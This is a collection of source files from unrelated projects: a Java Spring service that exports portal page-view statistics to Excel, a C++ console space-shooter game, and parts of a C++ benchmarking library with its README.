MrasPvAndUvList.stream().filter(mrasPvAndUv->mrasPvAndUv.getOptDesc().contains(key)).collect(Collectors.toList()); } @Deprecated//重构改递归getAllNavigatorsPVUV public List<WebSysNavigatorBis> getAllNavigatorsPVUV1() { // List<WebSysNavigatorBis> formatAllNavigators = formatAllNavigators(); // formatAllNavigators.stream().forEach(firstNavigator->{ // //查询一级菜单的pv/uv // if(firstNavigator.getChildrenWebSysNavigatorBis()==null||firstNavigator.getChildrenWebSysNavigatorBis().size()==0) { // List<WebSysNavigatorBis>singleNavPVUV = getPVUVbyId(firstNavigator.getId()); // if(!singleNavPVUV.isEmpty()) { // firstNavigator.setPV(singleNavPVUV.get(0).getPV()); // firstNavigator.setUV(singleNavPVUV.get(0).getUV()); // } // }else { // //查询二级菜单的pv/uv // firstNavigator.getChildrenWebSysNavigatorBis().stream().forEach(secondNavigator->{ // if(secondNavigator.getChildrenWebSysNavigatorBis()==null||secondNavigator.getChildrenWebSysNavigatorBis().size()==0) { // List<WebSysNavigatorBis>singleNavPVUV = getPVUVbyId(secondNavigator.getId()); // if(!singleNavPVUV.isEmpty()) { // secondNavigator.setPV(singleNavPVUV.get(0).getPV()); // secondNavigator.setUV(singleNavPVUV.get(0).getUV()); // } // }else { // //查询三级菜单 // } // }); // } // }); return null; } @Override public List<MrasPvAndUvBO> getAllPVUV(SearchConditionsBO searchConditionsBO) { return mrasRepository.getAllPVUV(searchConditionsBO); } @Override public String exportExcel(List<WebSysNavigatorBis> navsList,String outPath,String beginTime,String endTime) throws Exception { //格式化时间 SimpleDateFormat parseFormat = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); SimpleDateFormat outFormat = new SimpleDateFormat("yyyyMMdd"); String sheetBeginTime = outFormat.format( parseFormat.parse(beginTime)); String sheetEndTime = outFormat.format(parseFormat.parse(endTime)); //Workbook初始化工作 HSSFWorkbook wb = createHSSFWorkbook(); HSSFSheet sheet = wb.createSheet(String.format("门户访问统计%s-%s", sheetBeginTime,sheetEndTime)); //表头样式 HSSFCellStyle headStyle = setTableHeadStyle(wb); //一级目录样式 HSSFCellStyle firstStyle = setFirstDirStyle(wb); //二级目录样式 HSSFCellStyle secondStyle = setSecondDirStyle(wb); //内容字体样式 HSSFCellStyle contentStyle = setContentStyle(wb); // 表头开始--- //sheet.addMergedRegion(new CellRangeAddress(0, 0, 0, 1)); HSSFRow row0 = sheet.createRow(0); //设置列宽度 sheet.setColumnWidth(0, 256*30); sheet.setColumnWidth(1, 256*15); sheet.setColumnWidth(2, 256*15); //创建表头 HSSFCell cell0_0 = row0.createCell(0); HSSFCell cell0_1 = row0.createCell(1); HSSFCell cell0_2 = row0.createCell(2); // 设置表头样式 cell0_0.setCellStyle(headStyle); cell0_1.setCellStyle(headStyle); cell0_2.setCellStyle(headStyle); cell0_0.setCellValue("栏目"); cell0_1.setCellValue("访问人数"); cell0_2.setCellValue("访问次数"); //表头结束--- int rowNum = 1; for (WebSysNavigatorBis firstNav : navsList) { //一级nav HSSFRow firstNavRow = sheet.createRow(rowNum++); HSSFCell firstNavCell = firstNavRow.createCell(0); firstNavCell.setCellStyle(firstStyle); firstNavCell.setCellValue(firstNav.getName()); //二级nav for (WebSysNavigatorBis secondNav : firstNav.getChildrenWebSysNavigatorBis()) { HSSFRow secondNavRow = sheet.createRow(rowNum++); HSSFCell secondNavCell = secondNavRow.createCell(0); HSSFCell secondUVCell = secondNavRow.createCell(1); HSSFCell secondPVCell = secondNavRow.createCell(2); //设置二级nav样式 secondNavCell.setCellStyle(secondStyle); secondUVCell.setCellStyle(contentStyle); secondPVCell.setCellStyle(contentStyle); //设置二级nav内容 secondNavCell.setCellValue(secondNav.getName()); secondUVCell.setCellValue(Integer.parseInt(secondNav.getUV())); secondPVCell.setCellValue(Integer.parseInt(secondNav.getPV())); //三级nav for(WebSysNavigatorBis thirdNav :secondNav.getChildrenWebSysNavigatorBis()) { HSSFRow thirdNavRow = sheet.createRow(rowNum++); HSSFCell thirdNavCell = thirdNavRow.createCell(0); HSSFCell thirdUVCell = thirdNavRow.createCell(1); HSSFCell thirdPVCell = thirdNavRow.createCell(2); //设置三级nav样式 thirdNavCell.setCellStyle(contentStyle); thirdUVCell.setCellStyle(contentStyle); thirdPVCell.setCellStyle(contentStyle); //设置三级nav内容 thirdNavCell.setCellValue(thirdNav.getName()); thirdUVCell.setCellValue(Integer.parseInt(thirdNav.getUV())); thirdPVCell.setCellValue(Integer.parseInt(thirdNav.getPV())); } } } // 生成excel文件 SimpleDateFormat sdf = new SimpleDateFormat("yyyyMMddHHmmss"); Date date = new Date(); String formatDate = sdf.format(date); String excelPath = outPath+"门户访问统计-" + formatDate + ".xls"; FileOutputStream fileOut = new FileOutputStream(excelPath); wb.write(fileOut); fileOut.close(); wb.close(); return excelPath; } /** * 创建workbook初始化工作 * @return */ private HSSFWorkbook createHSSFWorkbook() { HSSFWorkbook wb = new HSSFWorkbook(); HSSFPalette palette = wb.getCustomPalette(); palette.setColorAtIndex(HSSFColor.BLUE.index, (byte)180, (byte)198, (byte)231); palette.setColorAtIndex(HSSFColor.DARK_BLUE.index, (byte)142, (byte)169, (byte)219); return wb; } /** * 表头样式 * @param wb * @return */ private HSSFCellStyle setTableHeadStyle(HSSFWorkbook wb) { // 改变字体样式 HSSFFont hssfFontTitile = wb.createFont(); // 设置字体,红色 //hssfFontTitile.setColor(HSSFFont.COLOR_RED); // 字体粗体显示 hssfFontTitile.setBold(true); hssfFontTitile.setFontName("等线"); // 字体大小 hssfFontTitile.setFontHeightInPoints((short) 13); // 设置样式 HSSFCellStyle tableHeadStyle = wb.createCellStyle(); tableHeadStyle.setFont(hssfFontTitile); // 设置居中 //tableHeadStyle.setAlignment(HorizontalAlignment.CENTER);// 水平居中 //tableHeadStyle.setVerticalAlignment(VerticalAlignment.CENTER);// 垂直居中 //设置单元格背景色 //cellStyle.setFillForegroundColor((short)555); //cellStyle.setFillPattern(FillPatternType.SOLID_FOREGROUND); return tableHeadStyle; } /** * 一级目录样式 * @param wb * @return */ private HSSFCellStyle setFirstDirStyle(HSSFWorkbook wb) { // 改变字体样式 HSSFFont hssfFontFirstDir = wb.createFont(); // 设置字体,红色 //hssfFontTitile.setColor(HSSFFont.COLOR_RED); // 字体粗体显示 hssfFontFirstDir.setBold(true); hssfFontFirstDir.setFontName("等线"); // 字体大小 hssfFontFirstDir.setFontHeightInPoints((short) 14); // 设置样式 HSSFCellStyle firstDirStyle = wb.createCellStyle(); firstDirStyle.setFont(hssfFontFirstDir); // 设置居中 //tableHeadStyle.setAlignment(HorizontalAlignment.CENTER);// 水平居中 //tableHeadStyle.setVerticalAlignment(VerticalAlignment.CENTER);// 垂直居中 //设置单元格背景色 firstDirStyle.setFillPattern(FillPatternType.SOLID_FOREGROUND); firstDirStyle.setFillForegroundColor(HSSFColor.BLUE.index); return firstDirStyle; } /** * 二级目录样式 * @param wb * @return */ private HSSFCellStyle setSecondDirStyle(HSSFWorkbook wb) { // 改变字体样式 HSSFFont hssfFontSecondDir = wb.createFont(); // 设置字体,红色 //hssfFontTitile.setColor(HSSFFont.COLOR_RED); // 字体粗体显示 hssfFontSecondDir.setBold(true); hssfFontSecondDir.setFontName("等线"); // 字体大小 hssfFontSecondDir.setFontHeightInPoints((short) 12); // 设置样式 HSSFCellStyle secondDirStyle = wb.createCellStyle(); //secondDirStyle.setBorderTop(BorderStyle.THIN); //secondDirStyle.setBorderBottom(BorderStyle.NONE); //secondDirStyle.setBorderLeft(BorderStyle.HAIR); //secondDirStyle.setBorderRight(BorderStyle.HAIR); secondDirStyle.setFont(hssfFontSecondDir); // 设置居中 //tableHeadStyle.setAlignment(HorizontalAlignment.CENTER);// 水平居中 //tableHeadStyle.setVerticalAlignment(VerticalAlignment.CENTER);// 垂直居中 //设置单元格背景色 //secondDirStyle.setFillPattern(FillPatternType.SOLID_FOREGROUND); //secondDirStyle.setFillForegroundColor(HSSFColor.BLUE.index); return secondDirStyle; } /** * 正文样式 * @param wb * @return */ private HSSFCellStyle setContentStyle(HSSFWorkbook wb) { // 改变字体样式 HSSFFont hssfFontContent = wb.createFont(); // 字体粗体显示 hssfFontContent.setFontName("等线"); // 字体大小 hssfFontContent.setFontHeightInPoints((short) 11); // 设置样式 HSSFCellStyle contentStyle = wb.createCellStyle(); contentStyle.setFont(hssfFontContent); return contentStyle; } } <file_sep>package com.ebupt.controller; import org.springframework.stereotype.Controller; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RequestMethod; import lombok.extern.slf4j.Slf4j; @Slf4j @Controller public class IndexController { @RequestMapping(value= {"","/index","/index.html"}) public String index() { log.info("访问主页..."); return "index"; } @RequestMapping(value= {"mrrs"},method = {RequestMethod.GET}) public String mrrs() { return "mrrs"; } @RequestMapping(value = {"mras"},method = {RequestMethod.GET}) public String mras() { return "mras"; } @RequestMapping(value = {"login"},method = {RequestMethod.GET}) public String login() { return "login"; } } <file_sep>package com.ebupt.controller; import java.io.BufferedInputStream; import java.io.File; import java.io.FileInputStream; import java.io.IOException; import java.io.OutputStream; import javax.servlet.http.HttpServletResponse; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RestController; import org.thymeleaf.util.StringUtils; import com.ebupt.entity.SearchConditionsBO; import com.ebupt.service.MrasService; @RestController public class MrasController { @Autowired private MrasService mrasService; @RequestMapping("mras/download") private String getMrasPVUV(HttpServletResponse res, String beginTime,String endTime,String includeName,String excludeName) throws Exception { if (StringUtils.isEmpty(beginTime) || StringUtils.isEmpty(endTime)) { return "参数无效!"; } // 设置日志搜索的时间区域 SearchConditionsBO searchConditionsBO = new SearchConditionsBO(); searchConditionsBO.setBeginTime(beginTime); searchConditionsBO.setEndTime(endTime); // 设置查询的用户名 String[] includeNames = includeName != null && includeName.length() > 0 ? includeName.replaceAll(",", ",").trim().split(",") : null; String[] excludeNames = excludeName != null && excludeName.length() > 0 ? excludeName.replaceAll(",", ",").trim().split(",") : null; searchConditionsBO.setIncludeNames(includeNames); searchConditionsBO.setExcludeNames(excludeNames); // excel生成 String excelPath = mrasService.downloadMrasUvPv(searchConditionsBO); // excel下载 String fileName = new String("报门户访问统计.xls".getBytes("UTF-8"), "ISO8859-1"); res.setHeader("content-type", "application/octet-stream"); res.setContentType("application/octet-stream"); res.setHeader("Content-Disposition", "attachment;filename=" + fileName); byte[] buff = new byte[1024]; BufferedInputStream bis = null; OutputStream os = null; try { os = res.getOutputStream(); bis = new BufferedInputStream(new FileInputStream(new File(excelPath))); int i = bis.read(buff); while (i != -1) { os.write(buff, 0, buff.length); os.flush(); i = bis.read(buff); } } catch (IOException e) { e.printStackTrace(); } finally { if (bis != null) { try { bis.close(); } catch (IOException e) { e.printStackTrace(); } } } return ""; } } <file_sep>package com.ebupt.service; import com.ebupt.entity.SearchConditionsBO; public interface MrrsService { /** * * @param searchConditionsBO * @return excel的路径 * @throws Exception */ String getReportsUvPv(SearchConditionsBO searchConditionsBO) throws Exception; } <file_sep>package com.ebupt.controller; import java.util.HashMap; import java.util.Map; import javax.servlet.http.HttpServletRequest; import org.springframework.stereotype.Controller; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.ResponseBody; import com.ebupt.entity.User; @Controller public class LoginController { @RequestMapping("/toLogin") @ResponseBody public Map<String,Object> login(HttpServletRequest request, String username, String password) { Map<String,Object> jsonObject = new HashMap<String,Object>(); if (username != null && password != null) { User user = getUserByUserNameAndPassword(username, password);// if (user != null) { //request.getSession().setAttribute("userId", user.getId()); request.getSession().setAttribute("userName", user.getUsername()); jsonObject.put("status", "0"); jsonObject.put("msg", "登录成功!"); return jsonObject; } else { jsonObject.put("status", "1"); jsonObject.put("msg", "账号或密码不正确,请重新登录!"); return jsonObject; } } else { jsonObject.put("status", "1"); jsonObject.put("msg", "请填写正确信息!"); return jsonObject; } } private User getUserByUserNameAndPassword(String userName,String passWord){ return new User("zhangsan","<PASSWORD>"); } } <file_sep>package com.ebupt.repository; import java.util.ArrayList; import java.util.List; import com.ebupt.entity.SearchConditionsBO; import com.ebupt.entity.TReportDirectory; import com.ebupt.entity.TReportInfo; public interface MrrsRepository { /** * 查询报表目录 * * @return */ ArrayList<TReportDirectory> getTReportInfo(); /** * 查询所有报表 * * @return */ List<TReportInfo> getAllReports(); /** * 查询pvuv * @param searchConditionsBO * @return */ List<TReportInfo> getReportUVPV(SearchConditionsBO searchConditions); } <file_sep>package com.ebupt.entity; import lombok.Data; @Data public class MrasPvAndUvBO { /** * 操作描述 */ private String optDesc; private String UV; private String PV; /** * 登陆名 */ private String userName; /** * 真实名字 */ private String realName; } <file_sep>package com.ebupt.service; import java.util.List; import com.ebupt.entity.MrasPvAndUvBO; import com.ebupt.entity.SearchConditionsBO; import com.ebupt.entity.WebSysNavigatorBis; public interface MrasService { /** * 生成excel并返回其路径 * * @param searchConditionsBO * @return excel的路径 * @throws Exception */ String downloadMrasUvPv(SearchConditionsBO searchConditionsBO) throws Exception; /** * 查询所有菜单 */ List<WebSysNavigatorBis> selectAllNavigators(); /** * 格式化菜单一个三级 一级菜单二级菜单具体页面 */ List<WebSysNavigatorBis> formatAllNavigators(); /** * 根据关键字从集合中检索 * @param key * @param MrasPvAndUvList * @return */ List<MrasPvAndUvBO>getPVUVByKey(String key,List<MrasPvAndUvBO>MrasPvAndUvList); /** * 根据条件查询所有nav的pv/uv * @param searchConditionsBO * @return */ List<MrasPvAndUvBO> getAllPVUV(SearchConditionsBO searchConditionsBO); /** * list生成excel * @param navsList * @param outPath 输出目录 * @param startTime * @param endTime * @return * @throws Exception */ String exportExcel(List<WebSysNavigatorBis>navsList,String outPath,String startTime,String endTime) throws Exception; }
83ac5ff1dabac85c1e09f29b1b11409beaa78544
[ "Java" ]
11
Java
aQzing/bi-uvpv-statistics
e1d66c7c4a6741b2371f297346e5d8946e1c9b49
d67c652cdf603b827755f056622add59a75ae5a6
refs/heads/master
<repo_name>khoadpham/angularwork<file_sep>/myApp/scripts/script.js /** * Created by kpham on 8/18/16. */ var fruitsApp = angular.module('fruitsApp', []); fruitsApp.controller ('fruitsController', function ($scope, $http){ //$scope.fruits = []; $http.get('scripts/fruits.json').then(function(result){ $scope.fruits = result.data; }); });
29d8af4e7ded54deca0531f0f3c9ce16133f0064
[ "JavaScript" ]
1
JavaScript
khoadpham/angularwork
40f93df0b29ea73ee552178a53f502090afa9de7
0962c4c7bc555f3fd9b8f6145cd3f5a2ce65820f
refs/heads/master
<repo_name>seddiekim/SpaceGame<file_sep>/Space-Game/Space-Game/createWorld.cpp #include "createWorld.h" const int KEY_LEFT = 75; const int KEY_RIGHT = 77; GameWorld::GameWorld() : m_player(nullptr) { m_level = 0; m_points = 0; m_lives = 3; m_cols = 0; m_rows = 0; m_alive = true; m_levelComplete = false; m_exit = false; m_hit = false; } void GameWorld::levelBeginMessage(string level) { //Open the specified level. If the file for the level does not exist, it is assumed that the player has won. ifstream inFile; string fileName = "Levels\\Level" + level + ".txt"; inFile.open(fileName); //Level file cannot load so player has won if (inFile.fail()) { system("cls"); cout << "Congratulations on winning!!!" << endl << "You had " << m_points << " points." << endl; exit(1); } system("cls"); cout << "Prepare for Level " << level << "." << endl; cout << "Press 'SPACE' to continue or 'x' to exit." << endl; bool continueGame = false; while (!continueGame && !m_exit) { if (_kbhit()) { switch (_getch()) { case 32: continueGame = true; break; case 'X': case 'x': m_exit = true; break; default: break; } } } } void GameWorld::hitMessage() { system("cls"); if (m_lives > 0) { cout << "Ouch! You've been hit by the enemy." << endl; cout << "You have " << m_lives << " lives remaining." << endl; cout << "Press 'c' to continue, or 'x' to exit." << endl; bool continueGame = false; while (!continueGame && !m_exit) { if (_kbhit()) { switch (_getch()) { case 'C': case 'c': //recreates the boardgame continueGame = true; m_hit = false; m_alive = true; break; case 'x': case 'X': //exits the game m_exit = true; break; default: break; } } } } else { cout << "Ouch! You lost the game chief." << endl; cout << "The enemies have won and taken over your planet!!" << endl; cout << "Press 'x' to exit the program." << endl; while (!m_exit) { if (_kbhit()) { switch (_getch()) { case 'x': case 'X': //exits the game m_exit = true; break; default: break; } } } } } void GameWorld::levelCompleteMessage(string level) //Display this message after completing a level { system("cls"); cout << "Congratulations, you beat Level " << level << "." << endl; cout << "You get another life because you beat the level!!!" << endl; cout << "Press 'c' to continue." << endl; //Delete the player and reset it delete m_player; m_player = nullptr; m_lives++; bool continueGame = false; while (!continueGame && !m_exit) { if (_kbhit()) { switch (_getch()) { case 'C': case 'c': continueGame = true; break; default: break; } } } } void GameWorld::createBoard(string level) //Creates the initial game board { //Open the specified level. If the file for the level does not exist, it is assumed that the player has won. ifstream inFile; string fileName = "Levels\\Level" + level + ".txt"; inFile.open(fileName); //Level file cannot load so player has won if (inFile.fail()) { cerr << "No such file exists"; exit(1); } m_level = stoi(level); string line; //Ensure that all variables of type vector are cleared, the player is set to alive status, and the level is not yet complete cleanUp(); m_alive = true; m_levelComplete = false; //Parse through the file and enter in the characters into a game board variable while (getline(inFile, line)) { vector<char> temp; for (int x = 0; x < line.length(); x++) { temp.push_back(line[x]); } m_board.push_back(temp); } //Retrieve the rows and cols for the specified game board m_rows = m_board.size(); m_cols = m_board[0].size(); //Parse through the game board and create the characters based on specified characters for (int row = 0; row < m_rows; row++) { for (int col = 0; col < m_cols; col++) { if (m_board[row][col] == 'x') { BasicEnemy* newEnemy = new BasicEnemy(row, col); m_Benemies.push_back(newEnemy); } else if (m_board[row][col] == 'v') { ShootingEnemy* newSEnemy = new ShootingEnemy(row, col); m_Senemies.push_back(newSEnemy); } else if (m_board[row][col] == '^') { m_player = new Player(row, col); } } } }; void GameWorld::updateBoard() //Redraws the game board with any modifications to the player and/or enemies { if (m_alive && !m_levelComplete) { //Clears screen system("cls"); //Clear the board as displayed in the vector for (int row = 0; row < m_rows; row++) { for (int col = 0; col < m_cols; col++) { if (m_board[row][col] != '#') { m_board[row][col] = ' '; } } } //Update Player position m_board[m_player->getRow()][m_player->getCol()] = '^'; //Update Bullet position before enemy position so that the enemy positions overlay the bullet for (int x = 0; x < m_Bullets.size(); x++) { m_board[m_Bullets[x]->getRow()][m_Bullets[x]->getCol()] = '|'; } //Update Enemy positions for (int x = 0; x < m_Benemies.size(); x++) { m_board[m_Benemies[x]->getRow()][m_Benemies[x]->getCol()] = 'x'; } for (int x = 0; x < m_Senemies.size(); x++) { m_board[m_Senemies[x]->getRow()][m_Senemies[x]->getCol()] = 'v'; } //Print header string header = "Level: " + to_string(m_level) + " Lives: " + to_string(m_lives) + " Points: " + to_string(m_points); cout << header << endl; //Updates the game board based on the player movement and the patterned enemy movement for (int row = 0; row < m_rows; row++) { for (int col = 0; col < m_cols; col++) { cout << m_board[row][col]; } cout << endl; } } } void GameWorld::movePlayer() //Moves the player based on user input { //If a keyboard input is registered, perform a particular action if (_kbhit()) { Bullet* playerBullet = new Bullet(m_player->getRow() - 1, m_player->getCol(), true); switch (_getch()) { case KEY_LEFT: case 'A': case 'a': //Move the player left if (m_player->getCol() > 1) { m_player->moveLeft(); } break; case KEY_RIGHT: case 'D': case 'd': //Move the player right if (m_player->getCol() < m_cols - 2) { m_player->moveRight(); } break; case 32: //Shoot a bullet m_Bullets.push_back(playerBullet); break; case 'X': case 'x': //Exit the game m_exit = true; break; default: //Prevent memory leak delete playerBullet; break; } } } void GameWorld::moveEnemy(enemDir& enemyDirection) //Moves the enemy units as a group { //Determine the minimum and maximum position of the enemies as observing them as a group to determine their possible movement trajectory int maxCol = -1; int minCol = m_cols; for (int x = 0; x < m_Benemies.size(); x++) { maxCol = max(maxCol, m_Benemies[x]->getCol()); minCol = min(minCol, m_Benemies[x]->getCol()); } for (int x = 0; x < m_Senemies.size(); x++) { maxCol = max(maxCol, m_Senemies[x]->getCol()); minCol = min(minCol, m_Senemies[x]->getCol()); } //Move the enemy units to the right if allowed to do so as defined by the game borders if (enemyDirection == RIGHT) { if (maxCol < m_cols - 2) { moveEnemiesRight(); } else { moveEnemiesLeft(); enemyDirection = LEFT; } } //Move the enemy units to the left if allowed to do so as defined by the game borders else { if (minCol > 1) { moveEnemiesLeft(); } else { moveEnemiesRight(); enemyDirection = RIGHT; } } } void GameWorld::moveEnemiesLeft() //Move each enemy a column to the left { for (int x = 0; x < m_Benemies.size(); x++) { m_Benemies[x]->setCol(m_Benemies[x]->getCol() - 1); } for (int x = 0; x < m_Senemies.size(); x++) { m_Senemies[x]->setCol(m_Senemies[x]->getCol() - 1); } } void GameWorld::moveEnemiesRight() //Move each enemy a column to the right { for (int x = 0; x < m_Benemies.size(); x++) { m_Benemies[x]->setCol(m_Benemies[x]->getCol() + 1); } for (int x = 0; x < m_Senemies.size(); x++) { m_Senemies[x]->setCol(m_Senemies[x]->getCol() + 1); } } void GameWorld::enemyShoot() { //Generate a distribution of random numbers random_device rd; mt19937 gen(rd()); uniform_int_distribution<> dis(1, 100); //Give each Shooting Enemy a 1% chance to shoot at each iteration for (int x = 0; x < m_Senemies.size(); x++) { if (dis(gen) == 1) { Bullet* enemyBullet = new Bullet(m_Senemies[x]->getRow() + 1, m_Senemies[x]->getCol(), false); m_Bullets.push_back(enemyBullet); } } } void GameWorld::moveBullet() //Moves the bullet in the proper direction { //If the bullet is from the player, it should move up. Otherwise, it should move down int x = 0; while (x < m_Bullets.size() && m_alive) { bool collision = false; //Move bullet up if player bullet if (m_Bullets[x]->isPlayerBullet()) { m_Bullets[x]->moveBullet(m_Bullets[x]->getRow() - 1); //Delete bullet from the vector if it goes out of bounds if (m_Bullets[x]->getRow() == 0) { delete m_Bullets[x]; m_Bullets.erase(m_Bullets.begin() + x); } else { //Determine if a bullet collides with an enemy if (!collision) { for (int y = 0; y < m_Benemies.size(); y++) { collision = checkCollision(m_Bullets[x], m_Benemies[y]->getRow(), m_Benemies[y]->getCol()); //If there is a collision, update the point count and delete the particular enemy and bullet from the vectors if (collision) { m_points += 100; delete m_Benemies[y]; m_Benemies.erase(m_Benemies.begin() + y); delete m_Bullets[x]; m_Bullets.erase(m_Bullets.begin() + x); break; } } } if (!collision) { for (int y = 0; y < m_Senemies.size(); y++) { collision = checkCollision(m_Bullets[x], m_Senemies[y]->getRow(), m_Senemies[y]->getCol()); if (collision) { m_points += 250; delete m_Senemies[y]; m_Senemies.erase(m_Senemies.begin() + y); delete m_Bullets[x]; m_Bullets.erase(m_Bullets.begin() + x); break; } } } } } //Move bullet down if an enemy bullet else { m_Bullets[x]->moveBullet(m_Bullets[x]->getRow() + 1); //Delete bullet from the vector if it goes out of bounds if (m_Bullets[x]->getRow() == m_rows - 1) { collision = true; delete m_Bullets[x]; m_Bullets.erase(m_Bullets.begin() + x); } //Determine if bullet collides with the player else { collision = checkCollision(m_Bullets[x], m_player->getRow(), m_player->getCol()); if (collision) { //Set player to dead and clean up the player m_alive = false; delete m_player; m_player = nullptr; m_hit = true; cleanUp(); m_lives--; } } } if (!collision) { x++; } } } bool GameWorld::checkCollision(Bullet* bullet, int objectRow, int objectCol) //Check for a collision if the rows and cols of two objects are the same { if (bullet->getCol() == objectCol && bullet->getRow() == objectRow) { return true; } return false; } bool GameWorld::isHit() { return m_hit; } bool GameWorld::isExit() //Return the exit status { return m_exit; } int GameWorld::getLives() //Return the number of lives left { return m_lives; } bool GameWorld::isAlive() //Return if the player is alive { return m_alive; } void GameWorld::checkIfComplete() //Determine if the level is complete if there are no more enemies left and the player is still alive { if (m_Benemies.size() == 0 && m_Senemies.size() == 0 && m_alive) { m_levelComplete = true; } } bool GameWorld::isLevelComplete() //Return if the level is complete { return m_levelComplete; } void GameWorld::cleanUp() //Clean up the game board from death { //Properly delete the enemies and bullets and clear their associated vectors for (int x = 0; x < m_Benemies.size(); x++) { delete m_Benemies[x]; } for (int x = 0; x < m_Senemies.size(); x++) { delete m_Senemies[x]; } for (int x = 0; x < m_Bullets.size(); x++) { delete m_Bullets[x]; } m_board.clear(); m_Benemies.clear(); m_Senemies.clear(); m_Bullets.clear(); } <file_sep>/Space-Game/Space-Game/characters.h #ifndef CHARACTERS_H_ #define CHARACTERS_H_ class Bullet { public: Bullet(int row, int col, bool playerBullet); int getRow(); int getCol(); bool isPlayerBullet(); void moveBullet(int row); private: int m_row; int m_col; bool m_playerBullet; }; class Player { public: Player(int row, int col); int getRow(); int getCol(); void moveRight(); void moveLeft(); private: int m_row; int m_col; }; class BasicEnemy { public: BasicEnemy(int row, int col); int getRow(); int getCol(); void setCol(int col); private: int m_row; int m_col; }; class ShootingEnemy { public: ShootingEnemy(int row, int col); int getRow(); int getCol(); void setCol(int col); private: int m_row; int m_col; }; #endif <file_sep>/Space-Game/Space-Game/createWorld.h #ifndef GAMEWORLD_H_ #define GAMEWORLD_H_ #include "characters.h" #include <iostream> #include <conio.h> #include <fstream> #include <sstream> #include <cstdlib> #include <random> #include <vector> #include <string> #include <algorithm> using namespace std; enum enemDir { LEFT, RIGHT }; class GameWorld { public: GameWorld(); void levelBeginMessage(string level); void hitMessage(); void levelCompleteMessage(string level); void createBoard(string fileName); void updateBoard(); void movePlayer(); void moveEnemy(enemDir& enemyDirection); void moveEnemiesLeft(); void moveEnemiesRight(); void enemyShoot(); void moveBullet(); bool checkCollision(Bullet* bullet, int objectRow, int objectCol); bool isHit(); bool isExit(); int getLives(); bool isAlive(); void checkIfComplete(); bool isLevelComplete(); void cleanUp(); private: int m_points; int m_lives; int m_cols; int m_rows; int m_level; bool m_alive; bool m_hit; // checks to see if the player has been hit bool m_levelComplete; bool m_exit; vector<vector<char>> m_board; Player* m_player; vector<BasicEnemy*> m_Benemies; vector<ShootingEnemy*> m_Senemies; vector<Bullet*> m_Bullets; }; #endif<file_sep>/Space-Game/Space-Game/characters.cpp #include "characters.h" Bullet::Bullet(int row, int col, bool playerBullet) { m_row = row; m_col = col; m_playerBullet = playerBullet; } int Bullet::getRow() { return m_row; } int Bullet::getCol() { return m_col; } bool Bullet::isPlayerBullet() { return m_playerBullet; } void Bullet::moveBullet(int row) { m_row = row; } Player::Player(int row, int col) { m_row = row; m_col = col; } int Player::getRow() { return m_row; } int Player::getCol() { return m_col; } void Player::moveLeft() { m_col--; } void Player::moveRight() { m_col++; } BasicEnemy::BasicEnemy(int row, int col) { m_row = row; m_col = col; } int BasicEnemy::getRow() { return m_row; } int BasicEnemy::getCol() { return m_col; } void BasicEnemy::setCol(int col) { m_col = col; } ShootingEnemy::ShootingEnemy(int row, int col) { m_row = row; m_col = col; } int ShootingEnemy::getRow() { return m_row; } int ShootingEnemy::getCol() { return m_col; } void ShootingEnemy::setCol(int col) { m_col = col; } <file_sep>/Space-Game/Space-Game/spaceGame.cpp #include "createWorld.h" bool gameOver = false; int main() { //Create a new GameWorld object GameWorld* world = new GameWorld(); //Initialize the level, timer for how often enemies move, and the start direction int level = 1; int moveEnemyTimer = 5; int timer = 0; enemDir enemDirection = RIGHT; world->createBoard(to_string(level)); world->levelBeginMessage(to_string(level)); //While the player is alive and hasn't completed the level nor tried to exit while (world->getLives() > 0 && !world->isExit()) { world->updateBoard(); //Move the player world->movePlayer(); //Move the enemy if the timer has reached the enemy timer if (timer == moveEnemyTimer) { world->moveEnemy(enemDirection); timer = 0; } //Give a chance for the enemy to shoot world->enemyShoot(); //Move all current bullets world->moveBullet(); //Check if the level is complete world->checkIfComplete(); //Update the game board if viable if (world->isHit()) { world->hitMessage(); if (world->isAlive()) { world->createBoard(to_string(level)); enemDirection = RIGHT; timer = 0; } } //If the player has beat the level, update the level else if (world->isLevelComplete()) { world->levelCompleteMessage(to_string(level)); level++; world->levelBeginMessage(to_string(level)); world->createBoard(to_string(level)); enemDirection = RIGHT; timer = 0; } timer++; } return 1; }
6e04a1c5bb00dfc9d7f9efd7dd2145fea61fd30e
[ "C++" ]
5
C++
seddiekim/SpaceGame
dc93ecaef80c46e3a5766d03c056dba9fce260e9
fe61beb03f6973a0f0eb14a3bae3689b2dfa6857
refs/heads/master
<repo_name>nestorjhernandezm/gauge<file_sep>/src/gauge/console_colors_unix.hpp /// Modified from <NAME>'s Hayai C++ Benchmark library /// See LICENSE.rst #pragma once #include <unistd.h> #include <cstdlib> #include <cstring> #include <cassert> #include "console_colors.hpp" namespace gauge { /// Makes it possible to disable terminal colors /// by running: /// /// export TERM=dumb /// /// @return true if the terminal supports colors inline bool has_colors() { if (::isatty(STDOUT_FILENO)) { char* term = ::getenv("TERM"); if (term && ::strcmp(term, "dumb")) return true; } return false; } /// Static helper class for outputting to a terminal/console. class console_impl { public: static int color_code(const console::textcolor& color) { int c = 0; switch (color) { case console::textblack: c = 30; break; case console::textblue: c = 34; break; case console::textgreen: c = 32; break; case console::textcyan: c = 36; break; case console::textred: c = 31; break; case console::textpurple: c = 35; break; case console::textyellow: c = 33; break; case console::textwhite: c = 37; break; default: assert(0); } return c; } static void print_color(std::ostream& stream, const console::textcolor& color) { if (!has_colors()) return; if (color == gauge::console::textdefault) stream << "\033[m"; else stream << "\033[0;" << color_code(color) << "m"; } }; } <file_sep>/README.rst gauge ----- .. image:: https://travis-ci.org/steinwurf/gauge.svg?branch=master :target: https://travis-ci.org/steinwurf/gauge gauge is a flexible C++ benchmarking tool. .. contents:: Table of Contents: :local: Build ----- We use the ``waf`` build system to build the gauge static library. We have some additional tools which may be found at waf_ .. _waf: https://github.com/steinwurf/waf If you already installed a C++14 compiler, git and python on your system, then you can clone this repository to a suitable folder:: git clone <EMAIL>:steinwurf/gauge.git Configure and build the project:: cd gauge python waf configure python waf build Run the unit tests:: python waf --run_tests You should now have the gauge static lib and also its dependencies compiled as static libs. When building the static lib, waf will also build the ``gauge_example`` executable. Depending on your platform you should be able to launch it by running:: ./build/linux/examples/sample_benchmarks/gauge_example Example Use ----------- See various use cases in the ``examples`` folder. 